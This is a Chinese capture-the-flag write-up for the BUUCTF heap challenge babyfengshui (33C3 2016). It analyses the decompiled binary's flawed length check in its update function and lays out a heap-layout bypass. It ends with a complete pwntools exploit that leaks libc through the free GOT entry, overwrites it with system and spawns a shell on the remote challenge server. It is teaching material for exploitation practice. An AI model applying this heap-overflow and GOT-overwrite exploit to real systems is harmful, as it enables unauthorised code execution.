BUUCTF pwn babyfengshui_33c3_2016(簡單堆)

0x01 文件分析

 

0x02 運行

 程序提供了幾個簡單的功能，增刪改查都有。運行的時候程序有定時機制，可以用IDA的patch功能修改二進制指令，消除定時。
 

0x03 靜態分析

主函數：

void __cdecl __noreturn main()
{
  char v0; // [esp+3h] [ebp-15h]
  int v1; // [esp+4h] [ebp-14h]
  size_t v2; // [esp+8h] [ebp-10h]
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  while ( 1 )
  {
    puts("0: Add a user");
    puts("1: Delete a user");
    puts("2: Display a user");
    puts("3: Update a user description");
    puts("4: Exit");
    printf("Action: ");
    if ( __isoc99_scanf("%d", &v1) == -1 )
      break;
    if ( !v1 )
    {
      printf("size of description: ");
      __isoc99_scanf("%u%c", &v2, &v0);
      Add(v2);
    }
    if ( v1 == 1 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      delete(v2);
    }
    if ( v1 == 2 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      display(v2);
    }
    if ( v1 == 3 )
    {
      printf("index: ");
      __isoc99_scanf("%d", &v2);
      update(v2);
    }
    if ( v1 == 4 )
    {
      puts("Bye");
      exit(0);
    }
    if ( (unsigned __int8)count > 49u )
    {
      puts("maximum capacity exceeded, bye");
      exit(0);
    }
  }
  exit(1);
}

Add:

 Add函數進行了兩次堆的申請，並且把第一次申請的堆的地址賦值到第二次申請的堆的數據之中，由此可以判斷出此函數利用了一個結構體，而第二次申請的堆的大小是固定的，可以得到結構體的數據結構：

struct Node{
	char * description;
	char name[0x7C];
}

s便是description的空間地址，而v2則是結構體的空間。
 
delete:

 檢查空間是否存在，free掉前面申請的空間並賦值爲0。
 
display:

 顯示數據
 
update:

 更新description裏面的數據，需要注意的是其檢查數據長度的方式(13行)，是以description堆塊的起始地址和name的起始地址之間的長度。
 

0x04 思路

 由於update函數中的判斷數據長度是否合法的方式有問題，可以通過申請連續小堆塊，再釋放申請大堆塊的方式繞過。
具體方式如下：
1.首先申請連續的3個結構體，description部分空間大小爲0x80，方便計算：

堆塊 0des 0x80	堆塊0 node 0x80	堆塊1 des 0x80	堆塊1 node 0x80	堆塊2 des 0x8	堆塊2 node 0x80

2.釋放第一個結構體，得到一個空閒的0x100的堆塊：

空閒堆塊 0x100	堆塊1 des 0x80	堆塊1 node 0x80	堆塊2 des 0x8	堆塊2 node 0x80

3.申請新的結構體，其description部分爲0x100，根據linux堆的性質，會優先分配空閒的堆塊，釋放得到的空閒堆塊可以滿足description的空間需求，而node的空間需要新分配，得到下面的結構：

堆塊 0 des 0x100	堆塊1 des 0x80	堆塊1 node 0x80	堆塊2 des 0x8	堆塊2 node 0x80	堆塊0 node 0x80

根據判斷數據合法長度的方式，堆塊0的des和name相差地址爲之間堆塊的長度的和，繞過了長度判斷，可以利用堆溢出來修改中間堆塊的塊首，得到libc，然後得到shell。
新版的libc其堆的機制有所改變(libc2.26及以上的，增加了tcache機制)，不能以此利用
 

0x05 exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

#p = process('./babyfengshui')
p = remote('node3.buuoj.cn', 28668)
elf = ELF('babyfengshui')

def Add(size, length, text):
	p.sendlineafter("Action: ", '0')
	p.sendlineafter("description: ", str(size))
	p.sendlineafter("name: ", 'qin')
	p.sendlineafter("length: ", str(length))
	p.sendlineafter("text: ", text)

def Del(index):
	p.sendlineafter("Action: ", '1')
	p.sendlineafter("index: ", str(index))

def Dis(index):
	p.sendlineafter("Action: ", '2')
	p.sendlineafter("index: ", str(index))

def Upd(index, length, text):
	p.sendlineafter("Action: ", '3')
	p.sendlineafter("index: ", str(index))
	p.sendlineafter("length: ", str(length))
	p.sendlineafter("text: ", text)

Add(0x80, 0x80, 'qin')
Add(0x80, 0x80, 'qin')
Add(0x8, 0x8, '/bin/sh\x00')
Del(0)

#注意堆塊塊首的長度
Add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))
Dis(1)
p.recvuntil("description: ")
free_addr = u32(p.recv(4))

libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
sys_addr = libc_base + libc.dump('system')

#堆塊1的description指針已經被修改爲free的地址，則可以將free地址內的內容替換爲system
Upd(1, 0x4, p32(sys_addr))
Del(2)

p.interactive()

一個簡單的網絡安全公衆號，歡迎各位朋友們關注！